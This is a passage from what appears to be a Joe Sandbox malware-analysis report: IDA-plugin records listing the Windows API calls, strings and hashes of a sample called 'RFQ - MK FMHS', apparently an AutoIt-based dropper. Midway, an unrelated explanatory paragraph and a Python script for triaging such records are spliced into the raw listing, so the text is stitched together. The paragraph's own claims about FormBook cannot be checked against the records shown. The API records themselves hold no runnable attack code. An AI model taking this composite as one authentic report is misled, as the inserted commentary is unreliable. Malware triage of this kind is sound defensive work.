                    • Instruction Fuzzy Hash: 3731D0765002196FDF10DBB4EC89AEE73ACEF48324F145176E801F32A0EB30DA4ACA54
                    APIs
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EF0BDE
                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00EFF910,00000000,?,00000000,?,?), ref: 00EF0C4C
                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00EF0C94
                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00EF0D1D
                    • RegCloseKey.ADVAPI32(?), ref: 00EF103D
                    • RegCloseKey.ADVAPI32(00000000), ref: 00EF104A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Close$ConnectCreateRegistryValue
                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                    • API String ID: 536824911-966354055
                    • Opcode ID: 66f28e0d2f7debc6c6c656bbe81577d298a73ce5e76d54b453867ff26e51fd4e
                    • Instruction ID: c414547833f1b3a8b2ee23a20627959a034f67637e0bddd11a99f2cb8b278301
                    • Opcode Fuzzy Hash: 66f28e0d2f7debc6c6c656bbe81577d298a73ce5e76d54b453867ff26e51fd4e
                    • Instruction Fuzzy Hash: F2025D752006159FDB14EF25C895E2AB7E5FF88724F04985DF98AAB362CB30ED41CB81
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00EDF37E
                    • _wcscmp.LIBCMT ref: 00EDF393
                    • _wcscmp.LIBCMT ref: 00EDF3AA
                      • Part of subcall function 00ED45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00ED45DC
                    • FindNextFileW.KERNEL32(00000000,?), ref: 00EDF3D9
                    • FindClose.KERNEL32(00000000), ref: 00EDF3E4
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00EDF400
                    • _wcscmp.LIBCMT ref: 00EDF427
                    • _wcscmp.LIBCMT ref: 00EDF43E
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00EDF450
                    • SetCurrentDirectoryW.KERNEL32(00F2A5A0), ref: 00EDF46E
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EDF478
                    • FindClose.KERNEL32(00000000), ref: 00EDF485
                    • FindClose.KERNEL32(00000000), ref: 00EDF497
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                    • String ID: *.*
                    • API String ID: 1824444939-438819550
                    • Opcode ID: ad39e0d1c46428cfe55c27b92babc3d2ebf8a0289b96983ef8ddad085b8f9e2d
                    • Instruction ID: bcbdda5832d4e993654042a17c7bce0f89348b476afe5dbd102a77e36721b7ed
                    • Opcode Fuzzy Hash: ad39e0d1c46428cfe55c27b92babc3d2ebf8a0289b96983ef8ddad085b8f9e2d
                    • Instruction Fuzzy Hash: B631E5715012196FDF10DBB4EC89AEF77ACDF49324F141276E811B32A0EB30DA4ACA64
                    APIs
                      • Part of subcall function 00EC874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EC8766
                      • Part of subcall function 00EC874A: GetLastError.KERNEL32(?,00EC822A,?,?,?), ref: 00EC8770
                      • Part of subcall function 00EC874A: GetProcessHeap.KERNEL32(00000008,?,?,00EC822A,?,?,?), ref: 00EC877F
                      • Part of subcall function 00EC874A: HeapAlloc.KERNEL32(00000000,?,00EC822A,?,?,?), ref: 00EC8786
                      • Part of subcall function 00EC874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EC879D
                      • Part of subcall function 00EC87E7: GetProcessHeap.KERNEL32(00000008,00EC8240,00000000,00000000,?,00EC8240,?), ref: 00EC87F3
                      • Part of subcall function 00EC87E7: HeapAlloc.KERNEL32(00000000,?,00EC8240,?), ref: 00EC87FA
                      • Part of subcall function 00EC87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00EC8240,?), ref: 00EC880B
                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EC825B
                    • _memset.LIBCMT ref: 00EC8270
                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EC828F
                    • GetLengthSid.ADVAPI32(?), ref: 00EC82A0
                    • GetAce.ADVAPI32(?,00000000,?), ref: 00EC82DD
                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EC82F9
                    • GetLengthSid.ADVAPI32(?), ref: 00EC8316
                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00EC8325
                    • HeapAlloc.KERNEL32(00000000), ref: 00EC832C
                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EC834D
                    • CopySid.ADVAPI32(00000000), ref: 00EC8354
                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EC8385
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EC83AB
                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EC83BF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                    • String ID:
                    • API String ID: 3996160137-0
                    • Opcode ID: 3cff47b799200bec1c5a7f327d8da86dba54b156b0a0394f827123a6f6e0af66
                    • Instruction ID: c6d0c82632b49a761d0c5bc4cc1f4900ff84b5f9acc9003bc188734a07de8eb7
                    • Opcode Fuzzy Hash: 3cff47b799200bec1c5a7f327d8da86dba54b156b0a0394f827123a6f6e0af66
                    • Instruction Fuzzy Hash: E5612D71A00109BFDF109F95DF44EAEBBB9FF44704F149269E815B7251DB319A06CB60
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oa$UCP)$UTF)$UTF16)
                    • API String ID: 0-3700951917
                    • Opcode ID: e772b1d9fd33731b66b173938019cfcc38f6cc5e97d887106ea752e776dfdc60
                    • Instruction ID: 799443bc8b2524544373ce199cd31c3b02ac9a0fc50c53f92ce960fad40d1abd
                    • Opcode Fuzzy Hash: e772b1d9fd33731b66b173938019cfcc38f6cc5e97d887106ea752e776dfdc60
                    • Instruction Fuzzy Hash: 25727F71E002199BDB14DF58C980BEEB7B5FF49314F1491AAE849FB281DB319D82CB90
                    APIs
                      • Part of subcall function 00EF10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EF0038,?,?), ref: 00EF10BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EF0737
                      • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                      • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00EF07D6
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00EF086E
                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00EF0AAD
                    • RegCloseKey.ADVAPI32(00000000), ref: 00EF0ABA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                    • String ID:
                    • API String ID: 1240663315-0
                    • Opcode ID: b619302ce2bc51fd022db2cf27d7b14571500a22b1615c1393982da7fc299ecb
                    • Instruction ID: 72036277a0ef8db48c753dcf125a947a4f76e98566606c929300ae0f809133b6
                    • Opcode Fuzzy Hash: b619302ce2bc51fd022db2cf27d7b14571500a22b1615c1393982da7fc299ecb
                    • Instruction Fuzzy Hash: 1DE15D31204714AFCB14DF25C881E6ABBE9EF89714F04956DF54AEB2A2DB30ED05CB51
                    APIs
                    • GetKeyboardState.USER32(?), ref: 00ED0241
                    • GetAsyncKeyState.USER32(000000A0), ref: 00ED02C2
                    • GetKeyState.USER32(000000A0), ref: 00ED02DD
                    • GetAsyncKeyState.USER32(000000A1), ref: 00ED02F7
                    • GetKeyState.USER32(000000A1), ref: 00ED030C
                    • GetAsyncKeyState.USER32(00000011), ref: 00ED0324
                    • GetKeyState.USER32(00000011), ref: 00ED0336
                    • GetAsyncKeyState.USER32(00000012), ref: 00ED034E
                    • GetKeyState.USER32(00000012), ref: 00ED0360
                    • GetAsyncKeyState.USER32(0000005B), ref: 00ED0378
                    • GetKeyState.USER32(0000005B), ref: 00ED038A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: 8390b2f398958570b51524133d6fdb5a665c3c5912fdc3435b66c6e8c6a6becf
                    • Instruction ID: 34ce7999c3facdd0407f252a71eb4ad840ff75369b5c063970db5c94e1a3c8ef
                    • Opcode Fuzzy Hash: 8390b2f398958570b51524133d6fdb5a665c3c5912fdc3435b66c6e8c6a6becf
                    • Instruction Fuzzy Hash: 9341A4245047C96EFF319AA488083B5BFA0EF52348F4C509FD5C6663C2EB949DC9C7A2
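Every record in this listing has the same shape: an "APIs" header, one bullet per imported call with its module, argument snapshot and call-site address ("ref"), callee-reached calls marked "Part of subcall function", then the "Memory Dump Source" block. Reading hundreds of these by hand is slow, so the Python below, an added example that is not part of the Joe Sandbox report or of the sample, parses that layout and flags records whose API set matches a capability cluster (keyboard-state polling, privileged shutdown, registry write, DACL editing on a user object, recursive directory walk). The capability table and the excerpt it runs on are constructed for the example; the excerpt abridges three records from this page. One caveat the output makes explicit: the key codes this record polls (0xA0, 0xA1, 0x11, 0x12, 0x5B) are all modifier keys, which is consistent with the AutoIt runtime's own input handling; on its own the record is not evidence of keystroke capture, and the stealer behaviour belongs to the injected FormBook payload covered elsewhere in the report.

```python
"""Triage helper for the per-function "APIs" records of a Joe Sandbox
IDA-plugin listing.  Added example; not part of the report or the sample."""
import re

# Constructed excerpt in the report's own layout (three records abridged
# from this page; non-API lines are included to show they are skipped).
SAMPLE_REPORT = """\
APIs
• GetKeyboardState.USER32(?), ref: 00ED0241
• GetAsyncKeyState.USER32(000000A0), ref: 00ED02C2
• GetKeyState.USER32(000000A0), ref: 00ED02DD
• GetAsyncKeyState.USER32(00000011), ref: 00ED0324
Memory Dump Source
• Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
Joe Sandbox IDA Plugin
• Instruction Fuzzy Hash: 9341A4245047C96EFF319AA488083B5BFA0EF52348F4C509FD5C6663C2EB949DC9C7A2
APIs
  • Part of subcall function 00EC8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EC8D0D
  • Part of subcall function 00EC8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EC8D3A
• ExitWindowsEx.USER32(?,00000000), ref: 00ED549B
Strings
Memory Dump Source
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EF0BDE
• RegCreateKeyExW.ADVAPI32(?,?,00000000,00EFF910,00000000,?,00000000,?,?), ref: 00EF0C4C
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00EF0D1D
Memory Dump Source
"""

# One API bullet: optional "Part of subcall function XXXXXXXX:" prefix,
# Name.MODULE, optional "(args)", then "ref: XXXXXXXX".  Names may carry
# C++ scope ("std::exception::exception") or a stdcall suffix ("@8").
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[\w:@]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Capability clusters (my own choice for this example): a record hits when
# it references every API in the set, ignoring the A/W suffix.
CAPABILITIES = {
    "keyboard state polling": {"GetAsyncKeyState", "GetKeyState"},
    "registry value write": {"RegCreateKeyEx", "RegSetValueEx"},
    "privileged shutdown/reboot": {"AdjustTokenPrivileges", "ExitWindowsEx"},
    "DACL edit on user object": {"GetSecurityDescriptorDacl", "AddAce",
                                 "SetUserObjectSecurity"},
    "recursive directory walk": {"FindFirstFile", "FindNextFile",
                                 "SetCurrentDirectory"},
}

# Virtual-key codes seen in the record above (Windows winuser.h values).
VK_NAMES = {0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN",
            0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}


def base_name(name):
    """Drop a trailing A/W (ANSI/wide) suffix so both variants compare equal."""
    return name[:-1] if len(name) > 1 and name[-1] in "AW" else name


def parse_records(text):
    """Return one dict per "APIs" record with its parsed call list."""
    records, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":               # a new record starts
            current = {"apis": []}
            records.append(current)
            continue
        if stripped == "Memory Dump Source":  # call list is over
            current = None
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if not m:                             # e.g. the "Strings" header
            continue
        args = m.group("args")
        current["apis"].append({
            "name": m.group("name"),
            "module": m.group("module"),
            "args": [] if args is None else args.split(","),
            "ref": int(m.group("ref"), 16),
            "subcall_of": m.group("sub"),     # None for a direct call
        })
    return records


def flag_capabilities(records, include_subcalls=True):
    """Match each record's API set against CAPABILITIES; refs are the
    call sites that contributed, so an analyst can jump straight to them."""
    findings = []
    for idx, rec in enumerate(records):
        calls = [c for c in rec["apis"]
                 if include_subcalls or c["subcall_of"] is None]
        present = {base_name(c["name"]) for c in calls}
        for label, needed in CAPABILITIES.items():
            if needed <= present:
                refs = sorted(c["ref"] for c in calls
                              if base_name(c["name"]) in needed)
                findings.append({"record": idx, "capability": label,
                                 "refs": ["%08X" % r for r in refs]})
    return findings


def polled_keys(record):
    """Which virtual keys a record asks GetAsyncKeyState/GetKeyState about."""
    keys = set()
    for c in record["apis"]:
        if base_name(c["name"]) in ("GetAsyncKeyState", "GetKeyState") and c["args"]:
            try:
                vk = int(c["args"][0], 16)
            except ValueError:                # "?" means the arg was dynamic
                continue
            keys.add(VK_NAMES.get(vk, "VK_%02X" % vk))
    return sorted(keys)


if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    for f in flag_capabilities(recs):
        print("record %d: %s at %s" % (f["record"], f["capability"], ", ".join(f["refs"])))
    print("record 0 polls:", polled_keys(recs[0]))
```

Run it over the full listing to rank functions for review; keys that are all modifiers (as here) point at library code, whereas a record polling letter and digit keys next to file or socket writes is the one to open in the disassembler first.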
                    APIs
                      • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                      • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                    • CoInitialize.OLE32 ref: 00EE8718
                    • CoUninitialize.OLE32 ref: 00EE8723
                    • CoCreateInstance.OLE32(?,00000000,00000017,00F02BEC,?), ref: 00EE8783
                    • IIDFromString.OLE32(?,?), ref: 00EE87F6
                    • VariantInit.OLEAUT32(?), ref: 00EE8890
                    • VariantClear.OLEAUT32(?), ref: 00EE88F1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                    • API String ID: 834269672-1287834457
                    • Opcode ID: 738af0a33a0e9edc200bcc6a04d58d1fe2d7d5ae79ad3532fb0eb8b0c0c9a8e0
                    • Instruction ID: 37aea6c2cbeca1a6ab41428e84657c5fefcf3be3a28f117d13160df98efd312a
                    • Opcode Fuzzy Hash: 738af0a33a0e9edc200bcc6a04d58d1fe2d7d5ae79ad3532fb0eb8b0c0c9a8e0
                    • Instruction Fuzzy Hash: F661E0706083459FD714DF26CA44B6ABBE4AF88714F50581EF989AB291CB30ED48CB92
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                    • String ID:
                    • API String ID: 1737998785-0
                    • Opcode ID: e5b30973c3d2406d7a79c191ce644a59f499f578d874d8ac7a638888ba06e64f
                    • Instruction ID: 94112844c24cec14433f19918ef5ea3c4cd3c26ada0aa15d26928ee7e39eb65f
                    • Opcode Fuzzy Hash: e5b30973c3d2406d7a79c191ce644a59f499f578d874d8ac7a638888ba06e64f
                    • Instruction Fuzzy Hash: 9A2182753012149FDB109F56EC49B7A77A8EF84715F11806AF906FB2B1CB30AD05CB94
                    APIs
                      • Part of subcall function 00E748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E748A1,?,?,00E737C0,?), ref: 00E748CE
                      • Part of subcall function 00ED4CD3: GetFileAttributesW.KERNEL32(?,00ED3947), ref: 00ED4CD4
                    • FindFirstFileW.KERNEL32(?,?), ref: 00ED3ADF
                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00ED3B87
                    • MoveFileW.KERNEL32(?,?), ref: 00ED3B9A
                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00ED3BB7
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00ED3BD9
                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00ED3BF5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                    • String ID: \*.*
                    • API String ID: 4002782344-1173974218
                    • Opcode ID: f2526bbf9293aa896fd56ca8d7ddd33e8ff68c85ebeab305c4c34ceabf205c56
                    • Instruction ID: d528b76324c7088d95f082649503897dee4286b6834b9b2ea1d679c92f6427e2
                    • Opcode Fuzzy Hash: f2526bbf9293aa896fd56ca8d7ddd33e8ff68c85ebeab305c4c34ceabf205c56
                    • Instruction Fuzzy Hash: 16517F318011489ADF15EBA0DD929EDB7B8EF14304F64A1ABE44A77191DF316F0ECBA1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID: ERCP$Oa$VUUU$VUUU$VUUU$VUUU
                    • API String ID: 0-3486589167
                    • Opcode ID: ce0d2d723268e1228de1ab1aac829f8df28b07b03aefd1fc554ec1baa8c997e3
                    • Instruction ID: 0569c3eaff9e0f531cba4e475aab4dec1a1e360505db21564b90e14ce8e9f1d0
                    • Opcode Fuzzy Hash: ce0d2d723268e1228de1ab1aac829f8df28b07b03aefd1fc554ec1baa8c997e3
                    • Instruction Fuzzy Hash: 8CA25EB0A0421ACBDF24DF58C9507EEB7B1FB54318F14A1AAD85EB7680E7709E81DB50
                    APIs
                      • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00EDF6AB
                    • Sleep.KERNEL32(0000000A), ref: 00EDF6DB
                    • _wcscmp.LIBCMT ref: 00EDF6EF
                    • _wcscmp.LIBCMT ref: 00EDF70A
                    • FindNextFileW.KERNEL32(?,?), ref: 00EDF7A8
                    • FindClose.KERNEL32(00000000), ref: 00EDF7BE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                    • String ID: *.*
                    • API String ID: 713712311-438819550
                    • Opcode ID: 35df69ae76d856dfde303ff13198036cfd1d98e0f9e89fe136a2c936509e43fd
                    • Instruction ID: 5e6c6a46ba45d5c0428f3573f4543b758a090daac99113fd0e7f6149fe10827d
                    • Opcode Fuzzy Hash: 35df69ae76d856dfde303ff13198036cfd1d98e0f9e89fe136a2c936509e43fd
                    • Instruction Fuzzy Hash: 3D419D7190020A9FCF10DF64CC85AEEBBB4FF05314F14556BE81AB62A0EB309E85CB90
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: f3a9a2e74f31249e162cd2d7e02a7fd0123b9053392db59b50051d92def97efc
                    • Instruction ID: 9e046514814ff454571267e6caaada4bac734d8660462e484e38e1af990d5a7e
                    • Opcode Fuzzy Hash: f3a9a2e74f31249e162cd2d7e02a7fd0123b9053392db59b50051d92def97efc
                    • Instruction Fuzzy Hash: FF127971A00609DBDF14DFA4DA81AEEB7F5FF48300F109569E84AB7251EB36AA11CB50
                    APIs
                      • Part of subcall function 00E90FF6: std::exception::exception.LIBCMT ref: 00E9102C
                      • Part of subcall function 00E90FF6: __CxxThrowException@8.LIBCMT ref: 00E91041
                    • _memmove.LIBCMT ref: 00EC062F
                    • _memmove.LIBCMT ref: 00EC0744
                    • _memmove.LIBCMT ref: 00EC07EB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
